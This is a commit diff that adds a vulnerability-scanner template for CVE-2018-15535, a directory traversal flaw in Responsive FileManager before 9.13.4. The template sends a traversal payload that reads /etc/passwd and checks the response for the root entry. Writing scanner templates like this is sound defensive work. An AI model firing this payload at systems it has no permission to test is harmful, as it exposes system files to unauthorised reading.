Create CVE-2018-15535.yaml
parent
67766f381a
commit
02e6ccfd7e
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-15535
|
||||
|
||||
info:
|
||||
name: Responsive FileManager < 9.13.4 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45271
|
||||
- https://www.cvedetails.com/cve/CVE-2018-15535
|
||||
tags: cve,cve2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue